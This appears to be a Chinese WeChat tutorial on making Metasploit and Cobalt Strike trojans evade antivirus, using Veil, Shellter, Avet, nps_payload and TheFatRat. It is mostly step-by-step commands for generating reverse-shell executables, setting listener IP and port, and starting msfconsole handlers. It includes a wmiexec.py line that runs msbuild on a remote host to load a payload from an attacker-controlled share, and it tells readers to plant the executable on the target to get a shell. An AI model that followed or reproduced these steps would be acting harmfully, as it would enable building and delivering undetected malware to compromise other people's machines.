本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
**零基础学黑客,领取配套视频
**
#统统可白嫖#
前言
常用后渗透过程中往往要使用 msf 和 cs 等工具的木马,而默认生成的木马非常容易被杀毒软件检出,这个时候就需要对木马进行免杀,本文介绍几款免杀工具的使用。
虽然经过杀毒软件多年更新,这些工具免杀效果可能已经很一般了,但是相比于自己写编码器解码器来做免杀更为方便简单,没有任何编程积累也可以直接使用。
docker 安装 veil
docker pull mattiasohlsson/veil
映射路径并运行
docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil |
list 命令可查看其两个免杀工具,Evasion 和 Ordnance
-
Evasion 可用于文件免杀
-
Ordnance 可生成 shellcode
进入Evasion
use 1
查看可用的payloads
list payloads
选择要使用的payloads,如选择ruby的meterpreter/rev_tcp
use 39
设置监听ip和端口
set lhost xx.xx.xx.xx
set lport 4444
生成可执行文件并取名test
generate
test
由于刚才配置了映射路径,可执行文件被生成在本机的/tmp/veil-output/compiled路径下,对应的msf的配置文件被生成在/tmp/veil-output/handlers路径下
在本地使用msf配置文件开启msf监听
msfconsole -r test.rc
将test.exe传入目标机器,并运行,反弹回shell
使用 cs 的 payload 为例
首先在 cs 的界面,攻击 - 生成后门 - payload generator-veil,保存为 payload.txt
开启 veil,之前步骤同上
选择13号payload
generate
在 generate 之后的选项中选择 3 号,自定义 payload,然后粘贴 payload.txt 内容,确认生成
shellter
下载 windows 版
https://www.shellterproject.com/download/
寻找或自行编译一个 32 位 pe 程序作为载体
打开 shellter
设置注入目标 pe 程序
选择本地 payload 或自定义 payload
L为本地
输入1选择常规的Meterpreter_Reverse_TCP
设置 lhost 和 lport
成功生成免杀恶意程序
git clone https://github.com/govolution/avet
cd avet
./setup.sh
使用 Avet 生成免杀文件
启动
python ./avet.py
选择要使用的 payload 编号
设置监听 ip 端口以及其他配置
生成免杀可执行文件
nps_payload
git clone https://github.com/trustedsec/nps_payload
cd nps_payload/
pip install -r requirements.txt
python nps_payload.py
选择1生成msf类型payload
选择payload类型
设置IP和端口
生成
1. 本地加载执行:
- %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml
2. 远程文件执行:
wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
msf 监听
msfconsole -r msbuild_nps.rc
TheFatRat
git clone https://github.com/Screetsec/TheFatRat
cd TheFatRat
chmod +x setup.sh
./setup.sh
运行
fatrat |
@
**欢迎加我微信:zkaq99、**实时分享安全动态
[
超级牛批的 IP 地址查询工具
2021-06-25
[
震惊!从一个 0day 到两个 0day 的奇妙之旅
2021-06-23
[
黑客技能|教你用手机代替各类门禁卡
2021-06-22
[
实战 | 偶遇一赌博网站,渗透诛之!
2021-06-20
[
一条 Fofa 搜索语法,实现批量挖洞
2021-06-15
[
黑客技能|断网攻击与监听演示
2021-06-04
如果文章对你有帮助,请点个 “赞”、“再看”